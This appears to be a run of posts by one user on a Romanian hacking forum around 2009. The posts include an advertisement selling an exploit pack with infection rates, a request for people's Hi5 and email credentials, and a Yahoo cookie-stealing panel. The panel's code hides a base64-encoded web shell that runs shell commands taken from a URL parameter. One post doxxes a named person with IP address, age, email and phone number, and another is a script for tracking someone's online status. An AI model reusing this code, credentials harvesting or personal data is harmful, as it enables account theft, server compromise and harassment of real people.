paxnWo

e vechi ala. mish are varianta 2009

botnet in sus, botnet in jos. ati auzit si voi de un cuvant si numai pe asta-l folositi. sunt sigur ca o parte dintre voi nici nu stie ( "partea" nu stie, nu "voi", ratatilor. acorduri, limba romana ) care-i diferenta dintre ddos si dos. tutoriale sunt cu zecile pe net. oricum pentru ceva bun contactati rusi. dar asa mari haceri sunteti voi de aveti nevoie de butnet ? cumparati de la mish, daca mai vinde, supernova.

a folosit cineva grsecurity ?

am dat si un mic comment pe acolo.

fast ! owned@mercedes~$ Mozilla Pastebin - collaborative debugging tool Hotfile.com: One click file hosting

Vand un pack cu 3 exploituri avand urmatoarele rate de infectare: 1) IE 6-7-8 ( 70% ) 2) FF ( 30% ) 3) FF 2.5.* ( 5% ) + bonus activeX pop-up pentru IE 6-7-8 . Pretul este de 300$. Cine este interesat sa imi dea PM.

Vreau sa afliu mai multe. Ce stiti ? Ati cumparat ? Ati facut ? Preturi ?

Salvati un .htaccess cu urmatoarele: RewriteEngine on RewriteBase / RewriteRule ^(.*)\.png$ $1.php [L] Salvati un index.php cu urmatoarele: <?php $fopen = fopen("a.txt", "a"); fwrite($fopen, "wink"); fclose($fopen); ?> Salvati fisierul a.txt gol cu perm 777. Salvati mail.php cu urmatoarele: <? $to = "emailul tau"; $from = ""; $subject = "s0z"; $message = <<<EOF <html> <img src="http://host.ro/index.png"> </html> EOF; $headers = "From: $from\r\n"; $headers .= "Content-type: text/html\r\n"; mail($to, $subject, $message, $headers); echo "d0ne."; ?> Accesati mail.php, deschideti mailul primit cu chrome, dati show images, apoi accesati a.txt. A scris "wink" in el, nu ? Deci se executa. Pe ff si ie nu merge.

o sa fac eu ceva in php. ca sa nu pierd timp trimiteti-mi mesaje cu: Hi5 acc [ user : pass ] Mail acc [ user : pass ] sa strang 100.

Am scris un script care verifica daca id-ul de yahoo cautat este online sau offline. Atunci cand un id este offline si devine online, esti atentionat printr-un bip ( si viceversa ). Scriptul se executa timp de X ore ( presupunem ca vrei sa-l prinzi pe respectivul cand devine online / offline ). Scriptul salveaza datele intr-un log.txt. Pot sa-l fac fie sa nu salveze in log.txt, fie sa afiseze doar cand un id isi schimba starea. L-am scris cum mi-a fost nevoie. Pentru feedback si idei, reply pl0x. Salvati codul de mai jos in ycheck.php Usage: start > run > cmd: cd D:\xampp\php d: php.exe ycheck.php <?php $id = 'paxnwo'; // id-ul de verificat $exec_time = 1; // timpul de executie in ore $date = date("g:i a (F j)"); $status_on = "Status: ONLINE @ $date \n"; $status_off = "Status: OFFLINE @ $date \n"; $echo_check = "Checking id: $id\n"; function beep ($int_beeps = 5) { for ($i = 0; $i < $int_beeps; $i++): $string_beeps .= "\x07"; endfor; isset ($_SERVER['SERVER_PROTOCOL']) ? false : print $string_beeps; } $url = "http://cn.opi.yahoo.com/online.php?users=$id&unq=".time(); $url_cont = file_get_contents($url); $offline = "var opi_user_status = new Array('0');"; $pos = strpos($url_cont,$offline); echo $echo_check; $sec = $exec_time*3600; $once = 0; $once2 = 0; for($i=1;$i<=$sec;$i++) { if ($pos === false) { echo $status_on; if ($once != 1) { $fl = fopen('log.txt', 'a'); fwrite($fl, "$echo_check\r\n$status_on\r\n"); fclose($fl); $once = 1; beep(); } else { $fl = fopen('log.txt', 'a'); fwrite($fl, "$status_on\r\n"); fclose($fl); $bip1=1; if ($bip2 == 1) beep(); $bip2=0; } } else { echo $status_off; if ($once2 != 1) { $fl = fopen('log.txt', 'a'); fwrite($fl, "$echo_check\r\n$status_off\r\n"); fclose($fl); $once2 = 1; beep(); } else { $fl = fopen('log.txt', 'a'); fwrite($fl, "$status_off\r\n"); fclose($fl); $bip2 = 1; if ($bip1 == 1) beep(); $bip1=0; } } flush(); sleep(1); $url_cont = file_get_contents($url); $pos = strpos($url_cont,$offline); } ?> also see http://rstcenter.com/forum/18702-php-time-loop.rst#post119809

maior nytro, ban pl0x.

mai degraba un 3day exploit. nu prea e chestie de showoff asta ...

dati scroll pana la "Character Encoding Calculator" la " HTML (with semicolons): " introduceti : & # 6 1 ; (fara spatii) apoi click pe decode. " & # 6 1 ; " inseamna " = " de ce apare alert ?

http://web-sniffer.net/

http://ptgmedia.pearsoncmg.com/imprint_downloads/informit/samples/phpmyadminToRoot.mp4

Happy Birthday

in lol.php am codul: $rand = rand(0, 10000); $fl = fopen('cooks.php', 'a'); fwrite($fl, "cod aici"); fclose($fl); unde scrie "cod aici" am codul: fwrite($fl, " <div> <div id="dhtmlgoodies_control"><a href="#" onclick="slidedown_showHide('box".$rand"');return false;">"IP: "</a></div> <div class="dhtmlgoodies_contentBox" id="box".$rand""> <div class="dhtmlgoodies_content" id="subBox".$rand""> " .$ip. " </div> </div> </div> </div> <div> <div id="dhtmlgoodies_control"><a href="#" onclick="slidedown_showHide('box".$rand"');return false;">"DATA: "</a></div> <div class="dhtmlgoodies_contentBox" id="box".$rand""> <div class="dhtmlgoodies_content" id="subBox".$rand""> " .$date. " </div> </div> <div> </div> <div> <div id="dhtmlgoodies_control"><a href="#" onclick="slidedown_showHide('box".$rand."');return false;">".$id."</a> </div> <div class="dhtmlgoodies_contentBox" id="box".$rand""> <div class="dhtmlgoodies_content" id="subBox".$rand""> "<tr><td><a href=\"http://msg.edit.yahoo.com/config/reset_cookies?.y=".$y."&.t=".$t."&.done=http%3A//us.mg1.mail.yahoo.com/ym/login%3Fymv%3D0\" target=\"_blank\"> "LOGIN" </a></td>" </div </div> </div> </div> "); ( l-am scris asa ca sa vedeti mai bine ; totul pe o singura linie http://alsdhlasdbasld.pastebin.com/m599cc51f ) in cooks.php am: <?php $myusername = "xss"; $mypassword = "lover"; $areaname = "nothin'"; if ($_SERVER["PHP_AUTH_USER"] == "" || $_SERVER["PHP_AUTH_PW"] == "" || $_SERVER["PHP_AUTH_USER"] != $myusername || $_SERVER["PHP_AUTH_PW"] != $mypassword) { header("HTTP/1.0 401 Unauthorized"); header("WWW-Authenticate: Basic realm=\"$areaname\""); echo "<h1>jet.</h1>"; die(); } eval(base64_decode('aWYoaXNzZXQoJF9HRVRbJ2NtZCddKSl7DQokZG89JF9HRVRbJ2NtZCddOw0Kc3lzdGVtKCRkbyk7IH0=')); ?> <html> <head> <style type="text/css"> .dhtmlgoodies_contentBox{ border:1px solid #317082; height:0px; visibility:hidden; position:absolute; background-color:#E2EBED; overflow:hidden; padding:2px; width:250px; } .dhtmlgoodies_content{ position:relative; font-family: Trebuchet MS, Lucida Sans Unicode, Arial, sans-serif; width:100%; font-size:0.8em; } </style> <script type="text/javascript"> var slideDownInitHeight = new Array(); var slidedown_direction = new Array(); var slidedownActive = false; var contentHeight = false; var slidedownSpeed = 3; var slidedownTimer = 7; function slidedown_showHide(boxId) { if(!slidedown_direction[boxId])slidedown_direction[boxId] = 1; if(!slideDownInitHeight[boxId])slideDownInitHeight[boxId] = 0; if(slideDownInitHeight[boxId]==0)slidedown_direction[boxId]=slidedownSpeed; else slidedown_direction[boxId] = slidedownSpeed*-1; slidedownContentBox = document.getElementById(boxId); var subDivs = slidedownContentBox.getElementsByTagName('DIV'); for(var no=0;no<subDivs.length;no++){ if(subDivs[no].className=='dhtmlgoodies_content')slidedownContent = subDivs[no]; } contentHeight = slidedownContent.offsetHeight; slidedownContentBox.style.visibility='visible'; slidedownActive = true; slidedown_showHide_start(slidedownContentBox,slidedownContent); } function slidedown_showHide_start(slidedownContentBox,slidedownContent) { if(!slidedownActive)return; slideDownInitHeight[slidedownContentBox.id] = slideDownInitHeight[slidedownContentBox.id]/1 + slidedown_direction[slidedownContentBox.id]; if(slideDownInitHeight[slidedownContentBox.id] <= 0){ slidedownActive = false; slidedownContentBox.style.visibility='hidden'; slideDownInitHeight[slidedownContentBox.id] = 0; } if(slideDownInitHeight[slidedownContentBox.id]>contentHeight){ slidedownActive = false; } slidedownContentBox.style.height = slideDownInitHeight[slidedownContentBox.id] + 'px'; slidedownContent.style.top = slideDownInitHeight[slidedownContentBox.id] - contentHeight + 'px'; setTimeout('slidedown_showHide_start(document.getElementById("' + slidedownContentBox.id + '"),document.getElementById("' + slidedownContent.id + '"))',slidedownTimer); } function setSlideDownSpeed(newSpeed) { slidedownSpeed = newSpeed; } </script> </head> <body bgcolor='black'> <script type="text/javascript"> setSlideDownSpeed(4); </script> de fiecare data cand se executa lol.php eu vreau ca el sa bage codul respectiv in cooks.php si sa-l afiseze in dropdown ( sursa pentru drop e de aici Dropdown content ) ceva gresesc in lol.php ...

respect. pana la urma o sa fie iar o revolutie in romania.

si ce e atat de amuzant in toata chestia asta ? plus ca e o porcarie de aplicatie.

ai facut-o publica in cele din urma

A auzit cineva de un indiviz ZmEu ? E smecher el. [URL="http://usadinspate.ro/paste/4b0a55a4b97d6.html"]PasteBox[/URL][URL="http://usadinspate.ro/paste/4b0a55a4b97d6.html"] [/URL][URL="http://usadinspate.ro/upload/index.php/files/get/Z1-_y4s8PX/paypal.zip"]Download File - paypal.zip - #CoW upload[/URL][URL="http://usadinspate.ro/paste/4b0a55a4b97d6.html"] [/URL] 89.137.170.180 - name: Ene Alin Gabriel - irc nicks: ZmEu - age: 18 - from: romania / braila - contact: zmeu@ymail.com - telephone: +40-755-259-353 zmeu.eu Se are cu SirVic, nebuni d'astia...

Detalii Server : shell.tor.hu Port : 7000 Channel : #CoW ------------------------------------------------- HOWTO: 1) Downloadati si instalati XChat ( XChat: Multiplatform Chat Program ) 2) Deschideti aplicatia, apasati CTRL + S, completati field-urile cu nickname-urile, la Networks apasati +Add, ii puneti numele securitychat, Edit, add irc.securitychat.org/6697, bifati Use SSL for all the servers on this network, Accept invalid SSL certificate, Favorite channels #CoW, close, Connect. 3) In fereastra canalului #CoW, scrieti: /msg nickserv register parola email 4) De fiecare data cand va conectati, scrieti: /identify parola sau CTRL + S > edit securitychat > Nickserv password ------------------------------------------------- ne-am strans cativa, va asteptam.

Download: Immunet - FREE AntiVirus Some info: Immunet - FREE AntiVirus Wiki: Immunet Trebuie incercat ;]

Cenzic released its report revealing the most prominent types of Web application vulnerabilities for the first half of 2009. The report details the steady rise of attacks targeting these exploits ultimately costing the U.S. a substantial amount of money in both IT damage and identity theft. Specifically, the report identified over 3,100 total vulnerabilities, which is a 10 percent increase in Web application vulnerabilities compared to the second half of 2008. Cenzic analyzed all reported vulnerability information from sources including NIST, MITRE, SANS, US-CERT, OSVDB, OWASP, as well as other third party databases for Web application security issues reported during the first half of 2009. Popular vendors including Sun, IBM, and Apache continue to be among the top 10 most vulnerable Web applications named. The most common published exploits on commercial applications were SQL Injection and Cross Site Scripting (XSS) vulnerabilities, which account for 25 percent and 17 percent of all Web attacks, respectively: Among Web browsers, Mozilla Firefox had the largest percentage of Web vulnerabilities, followed by Apple Safari, whose browser showed a vast increase in exploits, due to vulnerabilities reported in the Safari iPhone browser: Findings from the report point to the continued growth of attacks through Web applications. Web application vulnerabilities continue to make up the largest percentage of the reported vulnerability volume, with roughly 78 percent of all vulnerabilities resulting from them.

https://www.x.com/community/ppx/code_samples